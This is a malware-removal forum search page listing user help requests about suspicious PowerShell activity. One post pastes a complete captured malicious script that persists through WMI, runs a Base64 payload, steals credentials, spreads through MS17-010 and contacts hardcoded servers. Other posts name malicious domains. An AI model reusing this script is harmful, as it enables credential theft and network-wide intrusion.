Jump to content

Search the Community

Showing results for tags 'powershell'.



More search options

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Announcements
    • Malwarebytes News
    • Beta Testing Program
  • Malware Removal Help
    • Windows Malware Removal Help & Support
    • Mac Malware Removal Help & Support
    • Mobile Malware Removal Help & Support
    • Malware Removal Self-Help Guides
  • Malwarebytes for Home Support
    • Malwarebytes 3 Support Forum
    • Malwarebytes for Mac Support Forum
    • Malwarebytes for Android Support Forum
    • Malwarebytes for iOS Support
    • False Positives
    • Comments and Suggestions
  • Malwarebytes for Business Support
    • Malwarebytes Endpoint Protection
    • Malwarebytes Incident Response (includes Breach Remediation)
    • Malwarebytes Endpoint Security
    • Malwarebytes Business Products Comments and Suggestions
  • Malwarebytes Tools and Other Products
    • Malwarebytes AdwCleaner
    • Malwarebytes Junkware Removal Tool Support
    • Malwarebytes Anti-Rootkit BETA Support
    • Malwarebytes Techbench USB (Legacy)
    • Malwarebytes Secure Backup discontinued
    • Other Tools
    • Malwarebytes Tools Comments and Suggestions
  • General Computer Help and Security Updates
    • BSOD, Crashes, Kernel Debugging
    • General Windows PC Help
  • Research Center
    • Newest Rogue-Ransomware Threats
    • Newest Malware Threats
    • Newest Mobile Threats
    • Newest IP or URL Threats
    • Newest Mac Threats
    • Report Scam Phone Numbers
  • General
    • General Chat
    • Forums Announcements & Feedback

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


AIM


MSN


Website URL


ICQ


Yahoo


Jabber


Location


Interests

Found 19 results

  1. Dear, forum For the last couple of days, I have had a MBAE popup saying it has blocked an exploit attempt on Powershell. It pops up every 20 minutes. I have run RogueKiller, which only found an issue with Hola VPN (which I have now removed). I also tried to turn off Powershell in "Control Panel > Programs and features > Turn Window Features On and OFF". This did not help. I have Windows 10. I use Windows Defender as virus protection. The MBAE build is 1.12.1.139. After reading several posts, it seems to me that there is no one-fix-that-works-for-everyone. So I'm turning to you experts asking if you could please help me. Best regards, Harald
  2. Hello, i have problem with powershell.exe it slow down my pc, but i dont know what to do to delete him, can anybody help me please? I saw few topics and i installed frst64 in attach are logs. Thank you. Addition.txt FRST.txt
  3. Back on August 17, I installed Malwarebytes on my machine since I was having performance issues. The scan found 16 threats on my PC, and removed them as such. Even after this scan though, and several others, Windows Powershell is still performing some suspicious activity. Malwarebytes will occasionally notify me of an outbound connection to "wentz.pw" that Powershell keeps attempting to make. This is classified as "riskware", but I'm concerned since I can't get rid of it. Attached is the log for the most recent connection attempt. blocklog.txt
  4. Every time I restart my PC, I get a notification from Malwarebytes that a 'website was blocked due to malware'. It claims to be an outbound connection affecting the file 'powershell.exe'. The website is f.top4top.net. Malwarebytes identifies this as malware but it is not a program I can remove and I have never visited that website. I'm looking to sort out whatever the issue may be here. The logs can be found below. Malwarebytes www.malwarebytes.com -Log Details- Protection Event Date: 7/8/18 Protection Event Time: 4:25 PM Log File: 137327b6-82ed-11e8-8c03-1c1b0d993f99.json Administrator: Yes -Software Information- Version: 3.5.1.2522 Components Version: 1.0.374 Update Package Version: 1.0.5823 License: Trial -System Information- OS: Windows 10 (Build 17134.112) CPU: x64 File System: NTFS User: System -Blocked Website Details- Malicious Website: 1 , , Blocked, [-1], [-1],0.0.0 -Website Data- Category: Malware Domain: f.top4top.net IP Address: 185.186.244.145 Port: [49871] Type: Outbound File: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (end)
  5. Hi Malwarebytes support, My windows 10 was affected by adware/malware and I have used malwarebytes to remove most of it. However, there' still one malware that can't be removed by malwarebytes. Whenever I startup my windows a powershell cmd appears for a brief second and disappears. I took a screenshot for your reference (refer to attached). It appears to be a powershell command that executes new-object net.webclient.downloadstring(URL). Malwarebyte then detects a malware found at the location c:\windows\winime.exe and quarantines it. Sometimes a myexe.exe malware is also found. Hence i remove it from the quarantine. But that did not fix the problem. Everytime i restart my laptop, the powershell launched again and malwarebytes detected the malware again and quarantine it. Process repeats at every startup. It appears to be that the powershell command that was executed at startup causes this. I have no idea how to remove that powershell cmd or prevent the it from running the command. Please help. Would greatly appreciate your help on this. Malwarebyte did not detect the powershell problem. Regards, Dil
  6. I have PowerShell on windows server 2008 R2 using cpu 100% and I have attach file: Addition.txt and FRST.txt help analyze. I hope to get help with this issue. Thanks you, Oatstate Addition.txt FRST.txt
  7. Hello I have been having an issue with our server at work recently and cant get to the bottom of it. Two Powershell windows keep opening in the background running a script one of which consuming a lot of CPU power. I can end the task or suspend the process but it always returns. This machine hosts a domain and several users log into this server via remote desktop on the default port 3389 These are the scrips - the first one is the one using 70% of the CPU - the second one always appears first "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -NonI -W Hidden "$mon = ([WmiClass] 'root\default:Office_Updater').Properties['mon'].Value;$funs = ([WmiClass] 'root\default:Office_Updater').Properties['funs'].Value ;iex ([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($funs)));Invoke-Command -ScriptBlock $RemoteScriptBlock -ArgumentList @($mon, $mon, 'Void', 0, '', '')" powershell.exe -NoP -NonI -W Hidden -E $ s t i m e = [ E n v i r o n m e n t ] : : T i c k C o u n t  
 $ f u n s   =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : O f f i c e _ U p d a t e r ' ) . P r o p e r t i e s [ ' f u n s ' ] . V a l u e                  
 $ d e f u n = [ S y s t e m . T e x t . E n c o d i n g ] : : A S C I I . G e t S t r i n g ( [ S y s t e m . C o n v e r t ] : : F r o m B a s e 6 4 S t r i n g ( $ f u n s ) )  
 i e x   $ d e f u n  
  
 G e t - W m i O b j e c t   _ _ F i l t e r T o C o n s u m e r B i n d i n g   - N a m e s p a c e   r o o t \ s u b s c r i p t i o n   |   W h e r e - O b j e c t   { $ _ . f i l t e r   - n o t m a t c h   ' S C M   E v e n t   L o g s ' }   | R e m o v e - W m i O b j e c t  
 $ d i r p a t h = $ e n v : S y s t e m R o o t + ' \ s y s t e m 3 2 '        
 i f     ( ! ( t e s t - p a t h   $ d i r p a t h   ) ) {  
 	 $ d i r p a t h = $ e n v : S y s t e m R o o t  
 }  
 i f   ( ! ( t e s t - p a t h   ( $ d i r p a t h + ' \ m s v c p 1 2 0 . d l l ' ) ) )  
 { s e n t f i l e   ( $ d i r p a t h + ' \ m s v c p 1 2 0 . d l l ' )   ' v c p ' }  
 i f   ( ! ( t e s t - p a t h   ( $ d i r p a t h + ' \ m s v c r 1 2 0 . d l l ' ) ) )  
 { s e n t f i l e   ( $ d i r p a t h + ' \ m s v c r 1 2 0 . d l l ' )   ' v c r ' }  
  
 [ a r r a y ] $ p s i d s =   g e t - p r o c e s s   - n a m e   p o w e r s h e l l   | s o r t   c p u   - D e s c e n d i n g |   F o r E a c h - O b j e c t   { $ _ . i d }  
 $ t c p c o n n   =   n e t s t a t   - a n o p   t c p    
 $ e x i s t = $ F a l s e  
 i f   ( $ p s i d s   - n e   $ n u l l   )  
 {  
         f o r e a c h   ( $ t   i n   $ t c p c o n n )  
         {  
                 $ l i n e   = $ t . s p l i t ( '   ' ) |   ? { $ _ }  
                 i f   ( $ l i n e   - e q   $ n u l l )  
                 { c o n t i n u e }  
                 i f   ( ( $ p s i d s [ 0 ]   - e q   $ l i n e [ - 1 ] )   - a n d   $ t . c o n t a i n s ( " E S T A B L I S H E D " )   - a n d   ( $ t . c o n t a i n s ( " : 8 0   " )   - o r   $ t . c o n t a i n s ( " : 1 4 4 4 4 " ) )   )  
                 {  
                         $ e x i s t = $ t r u e  
                         b r e a k  
                 }  
         }  
 }  
 f o r e a c h   ( $ t   i n   $ t c p c o n n )  
         {  
                 $ l i n e   = $ t . s p l i t ( '   ' ) |   ? { $ _ }  
                 i f   ( ! ( $ l i n e   - i s   [ a r r a y ] ) ) { c o n t i n u e }  
                 i f   ( ( $ l i n e [ - 3 ] . c o n t a i n s ( " : 3 3 3 3 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 5 5 5 5 " ) - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 7 7 7 7 " ) )   - a n d   $ t . c o n t a i n s ( " E S T A B L I S H E D " ) )  
                 {  
                         $ e v i d = $ l i n e [ - 1 ]  
                         G e t - P r o c e s s   - i d   $ e v i d   |   s t o p - p r o c e s s   - f o r c e  
                 }  
         }  
 i f   ( ! $ e x i s t   - a n d   ( $ p s i d s . c o u n t   - l e   8 ) )  
 {        
         $ c m d m o n = " p o w e r s h e l l   - N o P   - N o n I   - W   H i d d e n   ` " ` $ m o n   =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : O f f i c e _ U p d a t e r ' ) . P r o p e r t i e s [ ' m o n ' ] . V a l u e ; ` $ f u n s   =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : O f f i c e _ U p d a t e r ' ) . P r o p e r t i e s [ ' f u n s ' ] . V a l u e   ; i e x   ( [ S y s t e m . T e x t . E n c o d i n g ] : : A S C I I . G e t S t r i n g ( [ S y s t e m . C o n v e r t ] : : F r o m B a s e 6 4 S t r i n g ( ` $ f u n s ) ) ) ; I n v o k e - C o m m a n d     - S c r i p t B l o c k   ` $ R e m o t e S c r i p t B l o c k   - A r g u m e n t L i s t   @ ( ` $ m o n ,   ` $ m o n ,   ' V o i d ' ,   0 ,   ' ' ,   ' ' ) ` " "  
         $ v b s   =   N e w - O b j e c t   - C o m O b j e c t   W S c r i p t . S h e l l  
 	 $ v b s . r u n ( $ c m d m o n , 0 )      
 }  
  
 $ N T L M = $ F a l s e  
 $ m i m i   =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : O f f i c e _ U p d a t e r ' ) . P r o p e r t i e s [ ' m i m i ' ] . V a l u e    
 $ a ,   $ N T L M =   G e t - c r e d s   $ m i m i   $ m i m i  
                
 $ N e t w o r k s   =   G e t - W m i O b j e c t   W i n 3 2 _ N e t w o r k A d a p t e r C o n f i g u r a t i o n   - E A   S t o p   |   ?   { $ _ . I P E n a b l e d }          
 $ i p s u   =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : O f f i c e _ U p d a t e r ' ) . P r o p e r t i e s [ ' i p s u ' ] . V a l u e    
 $ i 1 7   =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : O f f i c e _ U p d a t e r ' ) . P r o p e r t i e s [ ' i 1 7 ' ] . V a l u e  
 $ s c b a =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : O f f i c e _ U p d a t e r ' ) . P r o p e r t i e s [ ' s c ' ] . V a l u e  
 [ b y t e [ ] ] $ s c = [ S y s t e m . C o n v e r t ] : : F r o m B a s e 6 4 S t r i n g ( $ s c b a )            
 f o r e a c h   ( $ N e t w o r k   i n   $ N e t w o r k s )    
 {                          
          
         $ I P A d d r e s s     =   $ N e t w o r k . I p A d d r e s s [ 0 ]      
 	 i f   ( $ I P A d d r e s s   - m a t c h   ' ^ 1 6 9 . 2 5 4 ' ) { c o n t i n u e }   	  
         $ S u b n e t M a s k     =   $ N e t w o r k . I P S u b n e t [ 0 ]      
         $ i p s = G e t - N e t w o r k R a n g e   $ I P A d d r e s s   $ S u b n e t M a s k  
 	 $ t c p c o n n   =   n e t s t a t   - a n o p   t c p    
 	 f o r e a c h   ( $ t   i n   $ t c p c o n n )  
         {  
                 $ l i n e   = $ t . s p l i t ( '   ' ) |   ? { $ _ }  
                 i f   ( ! ( $ l i n e   - i s   [ a r r a y ] ) ) { c o n t i n u e }  
 	 	 i f   ( $ l i n e . c o u n t   - l e   4 ) { c o n t i n u e }  
 	 	 $ i = $ l i n e [ - 3 ] . s p l i t ( ' : ' ) [ 0 ]  
                 i f   (   ( $ l i n e [ - 2 ]   - e q   ' E S T A B L I S H E D ' )   - a n d     ( $ i   - n e   ' 1 2 7 . 0 . 0 . 1 ' )   - a n d   ( $ i p s   - n o t c o n t a i n s   $ i ) )  
                 {  
                         $ i p s + = $ i  
                 }  
         }  
         i f   ( ( [ E n v i r o n m e n t ] : : T i c k C o u n t - $ s t i m e ) / 1 0 0 0   - g t   5 4 0 0 ) { b r e a k }  
 	 $ s e = @ ( ' 1 0 7 . 1 7 9 . 6 7 . 2 4 3 ' , ' 1 7 2 . 2 4 7 . 1 1 6 . 8 ' )  
 	 $ n i c = ' 1 1 8 . 1 8 4 . 4 8 . 9 5 '  
 	 f o r e a c h ( $ t   i n   $ s e )  
 	 {  
 	 	 $ p i n = t e s t - c o n n e c t i o n   $ t  
 	 	 i f   ( $ p i n   - n e   $ n u l l )  
 	 	 {  
 	 	 	 $ n i c = $ t  
 	 	 	 b r e a k  
 	 	 }  
 	 }  
 	 $ n i c = $ n i c + " : 8 0 0 0 "  
  
         f o r e a c h   ( $ i p   i n   $ i p s )  
         {        
                 i f   ( ( [ E n v i r o n m e n t ] : : T i c k C o u n t - $ s t i m e ) / 1 0 0 0   - g t   5 4 0 0 ) { b r e a k }  
                 i f   ( $ i p   - e q   $ I P A d d r e s s ) { c o n t i n u e }            
                 i f   ( ( T e s t - C o n n e c t i o n   $ i p   - c o u n t   1 )   - n e   $ n u l l     - a n d   $ i p s u   - n o t c o n t a i n s   $ i p )    
                 {        
                         $ r e = 0  
                         i f   ( $ a . c o u n t   - n e   0 )              
                         { $ r e   =   t e s t - i p   - i p   $ i p   - c r e d s   $ a     - n i c   $ n i c   - n t l m   $ N T L M   }  
                         i f   ( $ r e   - e q   1 ) { $ i p s u   = $ i p s u   + "   " + $ i p }  
 	 	 	 e l s e  
 	 	 	 {  
 	 	 	 	 $ v u l = [ P i n g C a s t l e . S c a n n e r s . m 1 7 s c ] : : S c a n ( $ i p ) 	 	 	 	  
 	 	 	 	 i f   ( $ v u l   - a n d   $ i 1 7   - n o t c o n t a i n s   $ i p )  
 	 	 	 	 {  
 	 	 	 	 	 $ r e s = e b 7   $ i p   $ s c  
 	 	 	 	 	 i f   ( ! ( $ r e s   - e q   $ t r u e ) )  
 	 	 	 	 	 { e b 8   $ i p   $ s c }  
 	 	 	 	 	 $ i 1 7   =   $ i 1 7   +   "   " + $ i p  
 	 	 	 	 }  
 	 	 	 }  
                 }  
         }  
   }                
 $ S t a t i c C l a s s = N e w - O b j e c t   M a n a g e m e n t . M a n a g e m e n t C l a s s ( ' r o o t \ d e f a u l t : O f f i c e _ U p d a t e r ' )      
 $ S t a t i c C l a s s . S e t P r o p e r t y V a l u e ( ' i p s u '   , $ i p s u )  
 $ S t a t i c C l a s s . P u t ( )  
 $ S t a t i c C l a s s . S e t P r o p e r t y V a l u e ( ' i 1 7 '   , $ i 1 7 )  
 $ S t a t i c C l a s s . P u t ( )  Addition.txt FRST.txt mb.txt AdwCleaner[S1].txt MyConsoleSettings.txt MyScheduledTasks.txt
  8. I should thank to Malwarebytes to remove the Ransomware from my PC. unfotunately, it doesn't fix my computer completely. i read a post so i run the same thing like it was told. please help me to analyze my FR i should fixST and Addition file reported by farbar recovery tool. what i should do next? Addition.txt FRST.txt
  9. Hi my name is win. My computer platform is Windows 10 Yesterday My powershell started appearing on my taskbar, just popping up before promptly disappearing. I was suspicious but up to date Avast and Malwarebytes scans didn't find anything so I assumed it was just a dodgy Windows update or something. So I run Farbar Recovery Scan Tool and RougeKiller according to the topic below. I have seen the topic below but i don't know if there are a different between me and him. So i decidRk.txtRk.txtRk.txte to ask you for your advice. I have attached my result here below. Thank you very much for your kindly help. FRST.txt Addition.txt RoKiller.txt
  10. Hi! Im basically having the same exact problem as this guy: After powershell runs, Malwarebytes scans and finds the same three PUP's. I keep deleting them, but powershell keeps putting them back on my computer. I don't know what to do about it and I don't want to mess with the registry logs without an experts assistance. Please Help! The Pup files.txt
  11. Hi, I posted something similar a few weeks back but got no response. I think my computer is infected with malware that uses windows powershell to execute. I have Malwarebytes Premium and every now and then it blocks the domain 'tablezip.info'. It's persistent and every time I attempt to scan and remove it, it reappears after a few days and I get pop-ups and malicious adware. Any help removing would be greatly appreciated. Addition.txt FRST.txt
  12. So I've posted before about some odd happenings and never really found a solution but think I got a little closer. In my event logs, I have several power shell events like pshell console starting a server (among other things), Multiple WMI services starting, and browser redirects. Nothing has ever been found by Win defender or MBAM Premium (I really don't feel like they're working - on the surface they seem to working fine but I think it's an illusion). Hitman Pro did find a file Win32.Droma.abdb (first malicious file I've ever found) and that led me to googling that and found this article. http://niiconsulting.com/checkmate/2014/04/analysis-of-malware-detecting-behavior-anti-reversing-techniques/ ^^Please read! That almost explains my situation to a tee - I've even seen Russian/Chinese sites that will occasionally pop up on google suspiciously. If you look at my Registry or a Driverquery of my windows drivers, there are red flags everywhere. As far as I know I'm on the latest update of Win10 but I'm not sure anymore. I was hoping an expert could read the above article and know immediately what's going on or, if not, help me figure it out in order to get rid of it I've reinstalled windows after nuking it 5 times. I've been careful about any kind of syncing application (I don't even have chrome installed) and have reset the sync of any services I do use. I could go on but will stop here and wait for an experts advice should I run FRST? Oh yeah, some programs think I'm on Windows 8 (including mbam) and I thinks that's due to registry infection. i would LOVE to get a clean bill of health because this has consumed way to much of my life in the past ~8 months off an on. Thanks in advance! Fingers crossed
  13. Hi, so as the title states, Windows Powershell opens up maybe three or four times a day in the background and then quickly shuts itself down after a second. I haven't really seen any negative side effects from this, but it's starting to get annoying. I have run Malwarebytes scan but it has returned 0 identified threats. Are there any recommended options? Thank you!
  14. Every time I turn on my computer and start doing stuff, a windows powershell cmd pop up for a few seconds and then dissapear. I then start runing Malwarebytes and I find 5 Potentially Unwated Programs related to it. I put them on Quarantine and restart, and then everything start all over again. How do I get rid of whatever PowerShell is doing?
  15. Hi As stated from the title above, there is a suspicious program I've found in the startup as attached in the startup.txt named "{FB744D93...". I've tried to disable, and also removing it but nothing works. It is still there everytime upon laptop startup. It starts to behave like this after my brother inserted his flash drive into my laptop There is a topic that is more likely the same (if I'm not mistaken) that has been posted yesterday. Thus I have attached all the required files. Thanks in advance! Addition.txt FRST.txt regexport.txt startup.txt
  16. Iv got this really annoying problem with powershell.exe, sometimes i cant even access any internet domain and it doesnt let me update the antivirus (ESET). The powershell.exe starts up with windows and nothing that i did could prevent it from doing so, iv scanned this pc with Malwarebytes, RougueKiller, ZHPCleaner, ADWcleaner, Spyware and Farbar, but none of those found anything, besides rouguekiller, but the files it deleted came back as soon as the pc restarted. Im trully lost in this one, pls help Here are the logs from the scans iv ran Addition.txt FRST.txt JRT.txt mrt.log Roguekiller log.txt ZHPCleaner.txt
  17. I wrote a Powershell script that uploads and downloads files through FTP. The script is located on a server, and 5 computers have shortcuts that point to the script. Anti-Exploit is running on all computers and managed through the Management console on the server. One of the computers occasionally blocks this file and identifies it as an exploit. ("Exploit Payload process blocked"). Once the computer is restarted or anti-exploit is restarted, we don't have issues for days at a time. The issue ONLY occurs on this specific computer, and only sporadically.
  18. First time asking for help. For awhile(past week or so) now Powershell pops up for a sec in my taskbar, then Malwarebytes give me a popup saying that it blocks off some connection from forallshop.info, usually at 12:09 P.M. and 8:09 P.M. it also does this every day, though it has skipped a days once in awhile. My primary security is Mcafee. I've run Malwarebytes, the Malwarebytes adware cleaner, Anti-rootkit, and Junk Removal tool, I've also ran Zemana, Hitmanpro, and Sophos Virues Removal Tool. Any advice?
  19. Last week i wasn't able to use my internet banking due to the https certificate not being recognized. At the same time, some websites would not load, and Chrome kept saying i wasn't connected to the internet - which i was, as pages loaded normally on my phone. I reset my router to factory setting and reconfigured the network settings to no avail. It was only then that i found that my LAN is set to a proxy server on 127.0.0.1:30828. Once i unchecked that, everything was fine, but that option gets checked again (with a different port) everytime i reboot. As i was snooping around my active processes looking for the issue, i stumbled upon some that i didn't recognize, most notably one called SYS*MY PC NAMETAG*50.EXE, apparently related to powershell. It's located on the Java folder under syswow64, but it didn't exist until recently and i haven't updated Java in a while. It also eats up a shitload of memory... There's a few other processes i couldnt recognize, but i figured i should get a full activity log analysed by someone who might be able to pinpoint if there's any malware around. Could you guys please help me out?
×
×
  • Create New...

Important Information

This site uses cookies - We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.